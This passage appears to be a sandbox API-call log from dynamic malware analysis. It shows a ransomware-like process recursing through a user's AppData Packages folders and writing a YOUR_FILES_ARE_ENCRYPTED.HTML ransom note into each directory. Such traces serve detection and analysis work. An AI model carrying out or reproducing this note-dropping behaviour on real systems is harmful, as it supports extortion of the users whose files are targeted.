ftCreationTime.dwLowDateTime=0x88006be9, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x88006be9, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x88006be9, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dda6, dwReserved1=0x315dcf8, cFileName="..", cAlternateFileName="")) returned 1 [0116.443] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x88006be9, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x88006be9, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x88006be9, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dda6, dwReserved1=0x315dcf8, cFileName="..", cAlternateFileName="")) returned 0 [0116.443] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0116.443] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 130 [0116.443] GetProcessHeap () returned 0x600000 [0116.443] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.443] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.443] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.444] CloseHandle (hObject=0x214) returned 1 [0116.444] GetProcessHeap () returned 0x600000 [0116.445] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.445] GetProcessHeap () returned 0x600000 [0116.445] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.445] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x88006be9, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x88006be9, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x88006be9, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0116.445] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.445] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\TempState") returned 96 [0116.445] GetProcessHeap () returned 0x600000 [0116.445] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.445] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\TempState" [0116.445] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\TempState\\*" [0116.445] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x88006be9, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x88006be9, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x88006be9, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dda6, dwReserved1=0x315dcf8, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0116.445] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x88006be9, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x88006be9, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x88006be9, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dda6, dwReserved1=0x315dcf8, cFileName="..", cAlternateFileName="")) returned 1 [0116.445] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x88006be9, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x88006be9, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x88006be9, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dda6, dwReserved1=0x315dcf8, cFileName="..", cAlternateFileName="")) returned 0 [0116.445] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0116.445] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0116.445] GetProcessHeap () returned 0x600000 [0116.445] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.445] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.446] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.447] CloseHandle (hObject=0x214) returned 1 [0116.447] GetProcessHeap () returned 0x600000 [0116.447] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.447] GetProcessHeap () returned 0x600000 [0116.447] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.447] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x88006be9, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x88006be9, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x88006be9, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0116.447] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0116.447] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0116.447] GetProcessHeap () returned 0x600000 [0116.447] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.447] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.447] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0116.448] CloseHandle (hObject=0x320) returned 1 [0116.448] GetProcessHeap () returned 0x600000 [0116.448] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.448] GetProcessHeap () returned 0x600000 [0116.448] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0116.473] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6803cef0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6816e09e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x688e16a3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe", cAlternateFileName="MICROS~2.MIC")) returned 1 [0116.473] StrStrIW (lpFirst="Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.473] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe") returned 101 [0116.473] GetProcessHeap () returned 0x600000 [0116.473] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0116.474] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe" [0116.474] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\*" [0116.474] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6803cef0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6816e09e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x688e16a3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0116.476] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6803cef0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6816e09e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x688e16a3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0116.476] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6816e09e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6816e09e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6816e09e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0116.476] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.476] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC") returned 104 [0116.476] GetProcessHeap () returned 0x600000 [0116.476] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.476] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC" [0116.476] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\*" [0116.476] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6816e09e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6816e09e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6816e09e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15c, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0116.478] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6816e09e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6816e09e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6816e09e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0116.478] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6816e09e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6816e09e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6816e09e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15c, dwReserved1=0x63d090, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0116.478] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.478] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\INetCache") returned 114 [0116.478] GetProcessHeap () returned 0x600000 [0116.478] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0116.479] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\INetCache" [0116.479] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\INetCache\\*" [0116.479] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6816e09e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6816e09e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6816e09e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188570, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x626778 [0116.480] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6816e09e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6816e09e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6816e09e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188570, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0116.480] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6816e09e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6816e09e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6816e09e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188570, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 0 [0116.480] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0116.480] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 144 [0116.480] GetProcessHeap () returned 0x600000 [0116.480] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.481] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftsolitairecollection_8wekyb3d8bbwe\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.481] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.482] CloseHandle (hObject=0x320) returned 1 [0116.482] GetProcessHeap () returned 0x600000 [0116.482] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.482] GetProcessHeap () returned 0x600000 [0116.482] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.483] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6816e09e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6816e09e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6816e09e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15c, dwReserved1=0x63d090, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0116.483] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.483] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\INetCookies") returned 116 [0116.483] GetProcessHeap () returned 0x600000 [0116.483] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0116.484] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\INetCookies" [0116.484] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\INetCookies\\*" [0116.484] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6816e09e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6816e09e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6816e09e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188570, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0116.484] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6816e09e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6816e09e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6816e09e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188570, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0116.484] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6816e09e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6816e09e, ftLastAccessTime.dwHighDateTime=0x1d70071, 